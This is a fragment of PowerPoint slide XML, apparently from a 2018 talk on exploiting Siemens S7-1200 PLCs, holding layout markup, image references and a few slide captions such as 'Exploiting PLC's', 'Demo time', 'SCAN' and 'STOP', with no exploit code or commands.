              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D32D2DD-08C0-4C71-BA10-89512526A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525" y="3825472"/>
            <a:ext cx="2857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5347EE-9B6E-411A-963C-EFF1EA7984B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5500688" y="2282411"/>
            <a:ext cx="1914523" cy="2897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1B157A-4354-4519-B8FC-C059BACC61EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7341393" y="1932467"/>
            <a:ext cx="459583" cy="18930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4D9739-6753-4C74-A846-CE221121AD95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8349041" y="1951040"/>
            <a:ext cx="1861985" cy="18930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CBA7FE-A35C-49A6-A613-585E8B61C3E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7353525" y="3825471"/>
            <a:ext cx="2912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FF85AD-BA4C-4DFE-9B18-29CD1B4C728D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7341393" y="3806898"/>
            <a:ext cx="12133" cy="24569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C62C8B-CCCD-4C13-9BB8-CBBB5EDADEBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7396161" y="6263872"/>
            <a:ext cx="28794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0524C9-36AD-42F5-9494-B72002F4F6BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="10253660" y="3862618"/>
            <a:ext cx="1" cy="24012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5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" y="877107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0E7B1-7259-447E-A183-7BF4ED456BAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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What do they do?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="6ES7211-1BE40-0XB0 | Siemens S7-1200 PLC CPU, Ethernet ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{411431EE-14BB-4014-A73A-6FC41EEE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1302014"/>
            <a:ext cx="34671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iemens tia portal">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBF9A765-BE12-436C-8718-2DB1F618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302014"/>
            <a:ext cx="7924362" cy="49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D5939E-E915-4456-B520-2FEAE412FEBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5214938" y="3143250"/>
            <a:ext cx="5125130" cy="265136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82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" y="877107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0E7B1-7259-447E-A183-7BF4ED456BAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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What do they do?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="6ES7211-1BE40-0XB0 | Siemens S7-1200 PLC CPU, Ethernet ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{411431EE-14BB-4014-A73A-6FC41EEE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642143"/>
            <a:ext cx="34671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9BAA458-F6F7-4E8E-A74B-776894CC8D88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5431629" y="3581399"/>
            <a:ext cx="614363" cy="6000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274C48D-8E9D-4611-B2C5-6CEB9FDF31F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9853612" y="3581400"/>
            <a:ext cx="614363" cy="6000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B4807100-4DD7-4810-B832-31FBF1A3A269}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4979194" y="3376612"/>
            <a:ext cx="1223963" cy="1009648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2D13E545-47BE-45B7-9C6B-41F69595AF0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9694068" y="3363665"/>
            <a:ext cx="1223963" cy="1009648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8B79A-CEB9-42A0-B3B9-58F48EF134FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5600700" y="3269454"/>
            <a:ext cx="4707731" cy="230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51FA33-8D68-4715-9CE4-C22B0FDC4620}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5588794" y="4250407"/>
            <a:ext cx="4707731" cy="230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E6FA4425-EC25-4561-9F7F-C876FC853140}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9436621" y="2007670"/>
            <a:ext cx="833980" cy="50482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Top Corners Snipped 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2704B9B-3A75-4C76-A935-6049FC5E36FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1398486">
            <a:off x="5712849" y="2774594"/>
            <a:ext cx="533401" cy="315784"/>
          </a:xfrm>
          <a:prstGeom prst="snip2Same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Top Corners Snipped 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CB3B91F-C2F5-473D-A831-F0C7C246F3F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6840367" y="2844073"/>
            <a:ext cx="533401" cy="315784"/>
          </a:xfrm>
          <a:prstGeom prst="snip2Same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Top Corners Snipped 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79F9B62C-4705-42DF-84C7-8AD30C32D30D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8193878" y="2860804"/>
            <a:ext cx="533401" cy="315784"/>
          </a:xfrm>
          <a:prstGeom prst="snip2Same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Top Corners Snipped 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18C58C74-C8BA-4AAF-8F25-A2BF7E946580}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9522617" y="2844073"/>
            <a:ext cx="533401" cy="315784"/>
          </a:xfrm>
          <a:prstGeom prst="snip2Same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iagonal Stripe 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DFEE91B-756C-465F-950C-610EEEA4A615}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4816995" y="2183482"/>
            <a:ext cx="1009649" cy="83398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9D2168B-E69F-4CD1-9F99-F0AE003F48D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="10" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3771903" y="1843093"/>
            <a:ext cx="5829297" cy="416990"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 500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353D00A-6608-4CAB-80FD-D0B920159CE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3771899" y="3944155"/>
            <a:ext cx="1931193" cy="981723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6AFF223-6941-4DDF-896B-89A458C40B91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3824286" y="3881436"/>
            <a:ext cx="6231732" cy="1044443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BFD28D2-4C24-45EE-9AC3-7D4C4C1D3204}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3777341" y="2398665"/>
            <a:ext cx="1654288" cy="507729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Flowchart: Preparation 2047">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7D86507-9B10-4972-B986-FE28C1D26772}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8193878" y="4925878"/>
            <a:ext cx="1171968" cy="981723"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartPreparat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E30BD7FF-B8B6-4493-9C91-C5C9C1BF63DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8588829" y="4895443"/>
            <a:ext cx="63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latin typeface="Arial Black" panose="020B0A040201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13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  <p:bldP spid="2048" grpId="0" animBg="1"/>
      <p:bldP spid="20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Exploiting PLC’s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A93315-FEFA-4715-9EB1-D41273810692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2674728" y="3167390"/>
            <a:ext cx="684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Demo time </a:t>
            </a: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4963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594128"/>
            <a:ext cx="115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So… what happened?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="How to upgrade to Kali Linux 2.0 (Kali Sana) from Kali ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4555D4C8-4E5E-4BFA-9B07-3512B5F2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3" y="1896142"/>
            <a:ext cx="1890712" cy="11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se2.mm.bing.net/th?id=OIP.BoTb7YlqpUkG_gikgVvtoAHaEo&amp;pid=Api">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2E99001-E7B5-4E3E-B115-B64B24319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488" y="1896142"/>
            <a:ext cx="1765023" cy="11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6ES7211-1BE40-0XB0 | Siemens S7-1200 PLC CPU, Ethernet ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB7F51BB-E9D0-457A-A0CE-C02B8D90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244" y="1896142"/>
            <a:ext cx="1028729" cy="110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17E2B2C-ACF0-402B-B8E8-9929FE80B697}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3057495" y="2039022"/>
            <a:ext cx="2155993" cy="12700"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 500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https://tse4.mm.bing.net/th?id=OIP.fXsi7mOwSFphua8f-NV1kwHaHa&amp;pid=Api">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2272E07-1EAA-47AD-B31F-16B64469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42" y="1676737"/>
            <a:ext cx="724567" cy="72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0942D96-727A-42C0-B695-398C93C01EE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="3074" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3057496" y="2447245"/>
            <a:ext cx="2125733" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="bent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2CE75EC-563E-4E8B-8C73-43732265C31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057496" y="2447247"/>
            <a:ext cx="6046748" cy="328780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https://tse4.mm.bing.net/th?id=OIP.ZowmIhBGdMJ7BU9wg6ntLwHaJl&amp;pid=Api">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A39BEFD-5305-4C96-98E5-A398BC11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22" y="2016345"/>
            <a:ext cx="688234" cy="8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869DEA6-FF3B-4D76-801D-4159EDD7A1FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7021927" y="2489564"/>
            <a:ext cx="142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SCAN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3075" name="Rectangle 3074">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A578109-5F84-49A8-B805-62CD33036917}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4526809" y="3633113"/>
            <a:ext cx="1906648" cy="11022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CA9CB2-4E63-4D4C-834D-A9586CC9C649}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6365729" y="5143487"/>
            <a:ext cx="1906648" cy="11022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1E8356-7818-4C89-BF6C-28C1ED6E6633}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4526809" y="4087640"/>
            <a:ext cx="1906648" cy="65237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82" name="Picture 3081">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B9CA8D5-71DA-400C-9103-B251A56D6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3641" y="5143487"/>
            <a:ext cx="758166" cy="115143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547ED35-2B11-4FE8-966D-FB7FD30C4FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6365729" y="5809048"/>
            <a:ext cx="1906648" cy="4400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L-Shape 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00B0C385-F388-4EE2-BFCB-05A6FD16AA5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6277570" y="4263601"/>
            <a:ext cx="853798" cy="777703"/>
          </a:xfrm>
          <a:prstGeom prst="corner">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24575"/>
              <a:gd name="adj2" fmla="val 2627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43CB71F-7DF5-4A31-BE84-2B792EB87470}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6375023" y="5164614"/>
            <a:ext cx="1906648" cy="109747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L-Shape 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A6026A9-8367-4440-A2B6-0D858EE9FF8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="5579659" y="4735322"/>
            <a:ext cx="853798" cy="1357553"/>
          </a:xfrm>
          <a:prstGeom prst="corner">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24575"/>
              <a:gd name="adj2" fmla="val 2627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83" name="&quot;Not Allowed&quot; Symbol 3082">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{794BDE0B-5660-43F5-8C43-3AD3B73E6959}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5351047" y="5119268"/>
            <a:ext cx="702128" cy="665561"/>
          </a:xfrm>
          <a:prstGeom prst="noSmoking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3085" name="Connector: Elbow 3084">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D396383-4C3F-480D-B52D-B57EA4B063A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="3083" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="5351048" y="3327131"/>
            <a:ext cx="2600971" cy="2124918"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 145201"/>
            </a:avLst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38032CE-AA64-4ECC-A547-96369AA0B51F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8620924" y="2329447"/>
            <a:ext cx="328781" cy="1666590"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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21E4A67-2BD5-468B-A17F-66F4712EE8CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8393951" y="2025525"/>
            <a:ext cx="142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STOP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3093" name="Picture 10" descr="https://tse1.explicit.bing.net/th?id=OIP.dTDju5KXjwDBML-YXwqKZAHaHa&amp;pid=Api">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D5F2822-2923-4835-8A2F-7AC2CADB8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209" y="1788250"/>
            <a:ext cx="1317989" cy="131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Flowchart: Preparation 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F658D43-F41E-46AF-81E0-A9E724446E6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5038493" y="5148217"/>
            <a:ext cx="656681" cy="546890"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartPreparat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46B38B-6588-46E4-BC85-8228FF0E0414}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5215785" y="5106764"/>
            <a:ext cx="469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!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3094" name="Speech Bubble: Oval 3093">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58930EB0-2870-4544-9D07-1C48F3E109CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="3684131"/>
            <a:ext cx="2270736" cy="126013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72FEBAFE-5A04-4B34-AD00-E93A50A941E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7719633" y="3918261"/>
            <a:ext cx="1860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IM BATMA…. *GLUB GLUB*</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274079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9" grpId="0" animBg="1"/>
      <p:bldP spid="65" grpId="0"/>
      <p:bldP spid="67" grpId="0" animBg="1"/>
      <p:bldP spid="68" grpId="0"/>
      <p:bldP spid="3094" grpId="0" animBg="1"/>
      <p:bldP spid="309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4000">
                <a:srgbClr val="3A3A3A"/>
              </a:gs>
              <a:gs pos="83000">
                <a:srgbClr val="3A3A3A"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="3A3A3A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5233940"/>
            <a:ext cx="1171968" cy="136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251221"/>
            <a:ext cx="11582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But PLC’s aren’t connected to anything important, …RIGHT?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5130" name="Picture 10" descr="https://tse2.mm.bing.net/th?id=OIP.QUURxMb0z-DIB6_WISGFhgHaE7&amp;pid=Api">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7DBD420-215D-4357-898D-AC77EFDD8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464469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tse4.mm.bing.net/th?id=OIP.MEa6fO_t5Uu35rXUzVV8lgHaE7&amp;pid=Api">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B586A1F1-D4C1-41B6-9E8B-F3A4ECE6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1623483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tse1.mm.bing.net/th?id=OIP.NjFZsEPw0HNUaLW9pNou4wHaFY&amp;pid=Api">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10441E70-17D0-4759-B461-6FBFFA80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3433763"/>
            <a:ext cx="4514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tse3.mm.bing.net/th?id=OIP.m0fdd22Syslap-6CCd6yowHaFj&amp;pid=Api">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4788C9BA-BB23-4B72-B358-4FC22C31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3328988"/>
            <a:ext cx="45148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ilarious Batman GIF">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C45F6B3E-3BA5-4950-AF09-2B8025EE21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28" y="1790652"/>
            <a:ext cx="6163795" cy="425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6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4435</TotalTime>
  <Words>397</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>81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Bauhaus 93</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Krungthep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Jak Edwards</cp:lastModifiedBy>
  <cp:revision>101</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-05-13T11:45:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-06T20:19:22Z</dcterms:modified>
</cp:coreProperties>
</file>